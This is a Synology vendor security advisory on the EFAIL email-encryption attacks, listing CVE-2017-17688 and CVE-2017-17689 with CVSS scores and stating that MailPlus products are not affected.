Synology-SA-18:22 EFAIL
Publish Time: 2018-05-15 19:16:15 UTC+8
Last Updated: 2019-12-24 14:27:10 UTC+8
- Severity
- Not affected
- Status
- Resolved
Abstract
The EFAIL attacks allow remote attackers to reveal the plaintext of encrypted emails.
Synology products are not affected because MailPlus, Android MailPlus, and iOS MailPlus do not render HTML for OpenPGP nor S/MIME messages.
Affected Products
| Product | Severity | Fixed Release Availability |
|---|---|---|
| MailPlus | Not affected | N/A |
| Android MailPlus | Not affected | N/A |
| iOS MailPlus | Not affected | N/A |
Mitigation
None
Detail
CVE-2017-17688
- Severity: Moderate
- CVSS3 Base Score: 5.3
- CVSS3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
- ** DISPUTED ** The OpenPGP specification allows a Cipher Feedback Mode (CFB) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL. NOTE: third parties report that this is a problem in applications that mishandle the Modification Detection Code (MDC) feature or accept an obsolete packet type, not a problem in the OpenPGP specification.
CVE-2017-17689
- Severity: Moderate
- CVSS3 Base Score: 5.3
- CVSS3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
- The S/MIME specification allows a Cipher Block Chaining (CBC) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL.
Reference
- https://efail.de
- OpenPGP and S/MIME mail client vulnerabilities
- OpenPGP, S/MIME Mail Client Vulnerabilities
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17688
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-17689
Revision
| Revision | Date | Description |
|---|---|---|
| 1 | 2018-05-15 | Initial public release. |
| 2 | 2019-12-24 | Disclosed vulnerability details. |